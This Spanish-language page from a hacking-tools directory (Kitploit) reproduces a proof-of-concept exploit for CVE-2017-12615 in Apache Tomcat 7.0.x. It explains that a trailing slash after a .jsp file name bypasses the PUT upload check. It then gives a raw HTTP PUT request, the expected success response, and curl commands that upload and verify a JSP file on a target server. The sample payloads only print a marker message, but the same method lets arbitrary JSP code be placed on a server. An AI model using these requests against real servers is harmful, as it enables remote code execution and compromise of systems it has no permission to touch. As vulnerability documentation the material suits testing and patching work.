Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2017-12615 — Exploit PoC para la vulnerabilidad PUT JSP en Apache Tomcat 7.0.x (CVE-2017-12615). | Kitploit
Herramientas/GitHubGitHub/breaktoprotect/cve-2017-12615
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubbreaktoprotect/cve-2017-12615

CVE-2017-12615

Exploit PoC para la vulnerabilidad PUT JSP en Apache Tomcat 7.0.x (CVE-2017-12615).

Ver Repositorio
11221hace 6 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

En memoria de Chia Junyuan (https://packetstormsecurity.com/files/author/11924/)

POC CVE-2017-12615

POC de Exploit para Apache Tomcat 7.0.0 a 7.0.79 en Windows; vulnerabilidad PUT JSP CVE-2017-12615.

Descripción:

Por diseño, no está permitido subir archivos JSP mediante el método PUT en los servidores Apache Tomcat. Esta es probablemente una medida de seguridad para evitar que un atacante suba un shell JSP y obtenga ejecución remota de código en el servidor. Sin embargo, debido a comprobaciones insuficientes, un atacante podría obtener ejecución remota de código en servidores Tomcat 7.0.{0 a 79} que tengan habilitado PUT, solicitando el método PUT en el servidor Tomcat mediante una solicitud HTTP especialmente manipulada. Pero en serio, ¿especial? Por favor.

Método de explotación:

Agregando un carácter '/' después de la extensión del nombre de archivo, se puede omitir la verificación de la extensión del archivo. Eso es todo. Así que, en realidad, no es tan especial.

Exploit en un método de solicitud:

Solicitud

root@kitploit:~
PUT /myfile.jsp/
Host: domain-name:port
Connection: close
Content-Length: 85

<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>

Respuesta esperada si es exitoso

root@kitploit:~
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Sat, 23 Sep 2017 06:36:36 GMT
Connection: close

Exploit usando 'curl':

  1. Crear un archivo .jsp (por ejemplo, test.jsp):
root@kitploit:~
<% out.write("<html><body><h3>[+] JSP file successfully uploaded via curl and JSP out.write  executed.</h3></body></html>"); %>
  1. Ejecutar el comando curl en el servidor objetivo:
root@kitploit:~
curl -X PUT http://target-host-or-ip-address:port/test.jsp/ -d @- < test.jsp
  1. Verificar si tu archivo fue subido navegando a la dirección objetivo o:
root@kitploit:~
curl http://target-host-or-ip-address:port/test.jsp
Descargar herramienta